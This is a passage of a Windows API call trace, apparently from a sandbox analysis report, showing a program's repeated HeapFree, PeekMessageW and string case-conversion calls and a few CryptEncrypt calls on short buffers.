dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0199.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0199.377] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.377] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0199.377] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0199.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0199.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0199.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0199.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0199.378] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0199.378] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.378] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0199.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0199.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.378] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0199.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.378] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0199.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0199.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0199.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0199.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0199.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.379] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0199.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0199.379] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0199.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0199.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0199.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0199.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0199.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0199.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0199.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0199.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0199.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0199.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0199.380] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0199.380] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.380] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0199.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0199.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0199.380] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0199.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.380] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0199.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0199.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0199.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0199.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0199.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0199.381] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0199.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0199.381] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0199.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0199.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0199.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0199.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0199.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0199.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0199.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0199.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0199.381] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0199.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0199.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0199.381] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0199.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0199.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0199.382] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.382] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0199.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0199.382] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0199.382] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.382] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0199.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0199.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.382] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0199.382] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0199.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0199.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0199.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0199.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0199.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0199.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.383] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0199.383] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0199.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0199.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0199.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0199.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0199.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0199.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0199.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0199.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0199.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0199.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0199.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0199.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0199.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0199.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0199.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0199.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0199.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0199.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0199.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0199.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0199.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0199.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0199.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0199.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.394] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0199.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0199.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0199.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0199.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0199.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0199.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0199.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0199.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0199.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0199.395] CryptEncrypt (in: hKey=0xaa5660, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x8) returned 1 [0199.395] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.395] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.395] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.395] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.395] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0199.395] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.395] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.395] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0199.395] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.395] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0199.396] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.396] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.396] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.396] CryptEncrypt (in: hKey=0xaa5660, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24b18a8*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x8 | out: pbData=0x24b18a8*, pdwDataLen=0x8bef68*=0x8) returned 1 [0199.396] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.396] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.396] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.396] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.396] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.396] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.396] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.396] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0199.396] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.396] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0199.396] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.397] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.397] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0199.397] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 